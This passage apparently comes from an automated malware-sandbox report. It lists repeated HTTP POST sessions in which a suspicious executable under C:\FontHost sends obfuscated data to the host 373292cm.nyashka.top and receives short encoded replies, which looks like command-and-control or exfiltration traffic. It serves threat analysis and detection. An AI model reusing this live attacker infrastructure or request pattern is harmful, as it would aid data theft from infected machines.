                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.55988780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:56.448374033 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:56.804719925 CEST2504OUTData Raw: 5a 51 5c 52 54 45 54 5a 5b 5f 5a 51 59 53 58 50 57 5f 5d 5f 57 50 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\RTETZ[_ZQYSXPW_]_WPS_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,0/"[$_"#>>?->+>(#, 7++)040>/>&F$.Y/5
                              Aug 25, 2024 15:43:57.133373022 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:57.265538931 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.55988880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:57.388835907 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:57.742147923 CEST2500OUTData Raw: 5a 56 59 50 54 41 54 5e 5b 5f 5a 51 59 57 58 50 57 5e 5d 58 57 5c 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZVYPTAT^[_ZQYWXPW^]XW\SXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,?5=(#>==+(*+47 V+]40*8&F$.Y/
                              Aug 25, 2024 15:43:58.076239109 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:58.210088968 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.55988980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:58.342866898 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:58.747955084 CEST2504OUTData Raw: 5f 54 5c 51 51 43 51 5c 5b 5f 5a 51 59 50 58 5f 57 5b 5d 5c 57 50 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _T\QQCQ\[_ZQYPX_W[]\WPSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,35>4Y7 =+=4+:?=(#Z3#(V($4&.>&F$.Y/
                              Aug 25, 2024 15:43:59.017108917 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:43:59.214831114 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:58 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.55989080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:43:59.351645947 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:43:59.711064100 CEST2500OUTData Raw: 5f 53 59 55 51 42 51 5b 5b 5f 5a 51 59 57 58 53 57 51 5d 5f 57 59 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _SYUQBQ[[_ZQYWXSWQ]_WYS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/"-( V>==$>.%[?84#P#2??:$ V9Y8&F$.Y/5
                              Aug 25, 2024 15:44:00.016813993 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:00.215145111 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:43:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.55989180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:00.217914104 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1816
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:00.570620060 CEST1816OUTData Raw: 5f 51 5c 53 51 47 54 5c 5b 5f 5a 51 59 57 58 50 57 5b 5d 58 57 5a 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _Q\SQGT\[_ZQYWXPW[]XWZS[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^; ?"=\4%),_?!^?# 2<R*)+\#%Y;&F$.Y/
                              Aug 25, 2024 15:44:00.909636974 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:01.043731928 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 53 3d 25 22 59 31 05 3b 0c 30 33 2e 52 29 2e 23 59 2b 2d 07 14 33 38 04 07 25 2e 2f 0e 27 05 2a 02 3c 3e 29 09 25 59 27 5c 39 24 2b 5d 0c 13 21 07 23 03 36 5c 26 3c 02 5a 3d 06 27 16 21 2f 21 05 3c 29 36 08 2b 01 20 5f 3c 07 24 05 3c 5c 3d 0e 38 01 25 5e 2d 0e 0b 0f 34 14 2b 52 0d 11 24 52 29 2d 2d 1d 3d 00 3c 00 36 06 3b 12 33 2d 00 1e 24 22 07 0d 27 00 3c 5d 31 1c 2a 0e 27 22 21 56 25 05 3d 03 25 01 2d 50 35 08 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &S=%"Y1;03.R).#Y+-38%./'*<>)%Y'\9$+]!#6\&<Z='!/!<)6+ _<$<\=8%^-4+R$R)--=<6;3-$"'<]1*'"!V%=%-P5#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.55989280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:00.347337961 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:00.695502996 CEST2504OUTData Raw: 5a 55 59 50 51 45 51 5c 5b 5f 5a 51 59 54 58 5f 57 5d 5d 5b 57 50 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZUYPQEQ\[_ZQYTX_W]][WPSYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.Y,'E!>? !)(Y+->?[<7< V?9Y"0&/&F$.Y/)
                              Aug 25, 2024 15:44:01.003021955 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:01.142117023 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.55989380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:01.279098034 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:01.689753056 CEST2504OUTData Raw: 5a 50 59 57 54 43 54 51 5b 5f 5a 51 59 51 58 53 57 5a 5d 52 57 58 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZPYWTCTQ[_ZQYQXSWZ]RWXS[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,#3@5+4=)>+(=)_+<#,$7*:<7 %_/&F$.Y/=
                              Aug 25, 2024 15:44:01.971685886 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:02.173211098 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.55989480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:02.311347008 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:02.663439989 CEST2504OUTData Raw: 5f 52 5c 52 51 40 51 5b 5b 5f 5a 51 59 51 58 5e 57 5e 5d 52 57 59 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _R\RQ@Q[[_ZQYQX^W^]RWYSXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^;3 6=076=0<-*<=' $!10R?) 0:;.&F$.Y/=
                              Aug 25, 2024 15:44:02.977299929 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:03.110013008 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.55989580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:03.247137070 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:03.600975990 CEST2504OUTData Raw: 5a 52 5c 50 54 47 51 5a 5b 5f 5a 51 59 5f 58 51 57 5f 5d 5e 57 5e 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZR\PTGQZ[_ZQY_XQW_]^W^STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/U?@!=+7 6)=3<.9^(-#+Q710Q(*7#1\,&F$.Y/
                              Aug 25, 2024 15:44:03.930326939 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:04.061584949 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.55989680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:04.499299049 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:04.850905895 CEST2504OUTData Raw: 5f 5c 5c 57 51 47 54 5e 5b 5f 5a 51 59 51 58 55 57 5f 5d 5a 57 51 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _\\WQGT^[_ZQYQXUW_]ZWQS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/U'E#-##3!Y)[(Y(Z('#, 1R*97]49^.>&F$.Y/=
                              Aug 25, 2024 15:44:05.196268082 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:05.333832979 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.55989780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:05.490879059 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:05.835544109 CEST2504OUTData Raw: 5f 50 5c 56 54 47 51 5b 5b 5f 5a 51 59 54 58 5e 57 5f 5d 5a 57 5a 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _P\VTGQ[[_ZQYTX^W_]ZWZS\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,'A">8\ #))+<.[(= 4!1'<_']4V6/.&F$.Y/)


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.55989880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:06.062045097 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:06.413326025 CEST1828OUTData Raw: 5f 56 5c 51 54 40 54 59 5b 5f 5a 51 59 54 58 56 57 5d 5d 53 57 5f 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\QT@TY[_ZQYTXVW]]SW_S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_./#6=;73=+-(<=6(#X#<, W?:4 V9]8>&F$.Y/)
                              Aug 25, 2024 15:44:06.733351946 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:06.862045050 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 55 29 26 3e 58 26 28 24 50 25 30 2e 1d 2b 2e 38 03 29 04 39 5f 25 38 2d 5e 26 3e 05 0e 26 3b 26 00 28 2d 36 14 25 3c 27 5d 2e 34 2b 5d 0c 13 22 5c 21 39 3a 5d 26 3f 23 02 2a 01 2b 15 21 3c 36 59 3c 03 2d 55 3c 01 23 00 2b 39 37 10 3c 3a 22 1c 2c 28 0b 16 2f 33 2a 13 22 3e 2b 52 0d 11 24 56 28 2e 32 0e 29 58 37 5d 35 38 0e 03 33 3d 3e 13 32 0b 26 10 33 39 28 10 25 0b 25 55 24 1f 22 0e 24 2b 0b 02 32 2c 3e 0d 23 32 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &U)&>X&($P%0.+.8)9_%8-^&>&;&(-6%<'].4+]"\!9:]&?#*+!<6Y<-U<#+97<:",(/3*">+R$V(.2)X7]583=>2&39(%%U$"$+2,>#2#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.55989980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:06.185082912 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:06.538404942 CEST2504OUTData Raw: 5f 50 5c 56 51 40 51 5e 5b 5f 5a 51 59 5f 58 50 57 5d 5d 5a 57 50 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _P\VQ@Q^[_ZQY_XPW]]ZWPS[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,,#.<Y >-+?-5^+-4Z0#8W?*(70;>&F$.Y/
                              Aug 25, 2024 15:44:06.846963882 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:06.977273941 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.55990080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:07.151920080 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Aug 25, 2024 15:44:07.507173061 CEST2500OUTData Raw: 5f 56 5c 55 51 43 51 5c 5b 5f 5a 51 59 57 58 53 57 59 5d 5b 57 58 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\UQCQ\[_ZQYWXSWY][WXS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.8U$!.779Z*>,\<&).+ /? 2,?:$4"/>&F$.Y/5
                              Aug 25, 2024 15:44:07.856683016 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:07.987875938 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:07 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.2.55990180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
